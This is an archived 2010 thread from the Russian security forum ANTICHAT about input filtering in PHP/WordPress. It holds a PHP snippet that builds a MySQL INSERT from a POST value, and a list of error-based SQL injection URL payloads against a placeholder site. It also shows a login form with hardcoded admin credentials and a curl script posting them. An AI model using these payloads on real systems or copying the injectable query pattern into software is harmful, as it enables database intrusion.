ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
08.06.2010, 18:49
|
|
Участник форума
Регистрация: 21.09.2008
Сообщений: 148
Провел на форуме:
678893
Репутация:
102
|
|
2 Adio
ну как бы это есть верный подход, данные которые заносятся в базу ничем и никак фильтровать не надо, а фильтровать от всяких xss надо уже на выходе, ну раз тебе уж так хочется, то делай.
просто перед записью в бд фильтруй, тем же способом что я написал выше, например
PHP код:
<?php
$name = $_POST['name']; //передаваемый параметр name с формы
$name = htmlentites(...);
....
mysql_query("INSERT INTO .... VALUES('{$name}', ...)");
....
?>
2 CyberHunter
в денвере если не ошибаюсь, есть phpmyadmin, там и смотри в какой кодировке все нормально, и ставь её в wp-config.php
//define('DB_CHARSET', 'utf8');
Последний раз редактировалось Failure; 08.06.2010 в 18:53..
|
|
|
08.06.2010, 20:22
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от Failure
данные которые заносятся в базу ничем и никак фильтровать не надо
Код HTML:
insert into test (id,a) values (1,'sqli');
insert into test (id,a) values (sqli,'test');
insert into test set id=sqli;
insert into test set a='sqli';
update test set id=sqli where...;
update test set a='sqli' where...;
Код HTML:
http://site.com/?sqli=1')on duplicate key update a=(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--
http://site.com/?sqli=1,(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a))--
http://site.com/?sqli=1 on duplicate key update a=(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)
http://site.com/?sqli=1'on duplicate key update a=(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--
http://site.com/?sqli=1 where (1)=(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--
http://site.com/?sqli=1'where (1)=(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--
Последний раз редактировалось Redwood; 08.06.2010 в 20:36..
|
|
|
|
08.06.2010, 21:13
|
|
Участник форума
Регистрация: 01.01.2009
Сообщений: 138
Провел на форуме:
817404
Репутация:
82
|
|
Какие бд, вы чё? Эта фигня при аякся, чтобы убрать надо в файлах к которым идёт запрос аякса прописать хеадер, в этом вордпресе половину переписывать прешлось
|
|
|
|
09.06.2010, 00:02
|
|
Познающий
Регистрация: 09.11.2009
Сообщений: 32
Провел на форуме:
79679
Репутация:
3
|
|
У меня такой вопрос. Есть форма на сайте site.com/index.php:
PHP код:
<?php
if ( isset($_POST['login']) && isset($_POST['pass']) && $_POST['login'] == 'admin' && $_POST['pass'] == 'admin') {
echo 'DATA';
} else {
echo <<<here
<form method='POST'>
<input type='text' name='login'>
<input type='text' name='pass'>
<input type='submit'>
</form>
here;
}
?>
Как получить доступ к строке DATA с локалхоста ? |
|
|
|
09.06.2010, 00:17
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
site.com/index.php
сделать post запрос такой:
login=admin&pass=admin
Ну или в формочку ввести admin и admin
|
|
|
|
09.06.2010, 01:20
|
|
Познающий
Регистрация: 09.11.2009
Сообщений: 32
Провел на форуме:
79679
Репутация:
3
|
|
а по подробней можно ??
|
|
|
|
09.06.2010, 01:21
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Судя по коду, форма выводится на сайте
в оба поля вбей admin и все
|
|
|
|
09.06.2010, 01:23
|
|
Познающий
Регистрация: 09.11.2009
Сообщений: 32
Провел на форуме:
79679
Репутация:
3
|
|
да нет же... мне нужно с локального сервера, через программу залогинится и через функцию file_get_contents сохранить строку
|
|
|
|
09.06.2010, 01:25
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
My favourite curl
PHP код:
$curl = curl_init();
curl_setopt($curl,CURLOPT_URL,"http://site.com/index.php");
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,30);
curl_setopt($curl,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.7) Gecko/20091221 MRA 5.6 (build 03278) Firefox/3.5.7 sputnik unknown");
curl_setopt($curl,CURLOPT_POST, 1);
curl_setopt($curl,CURLOPT_POSTFIELDS, "login=admin&pass=admin");
curl_setopt($curl,CURLOPT_ENCODING,"gzip,deflate");
$ret = curl_exec($curl);
echo $ret;
|
|
|
|
09.06.2010, 01:28
|
|
Познающий
Регистрация: 09.11.2009
Сообщений: 32
Провел на форуме:
79679
Репутация:
3
|
|
да ! чтото наподобии этого мне было нужно. сенкс
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид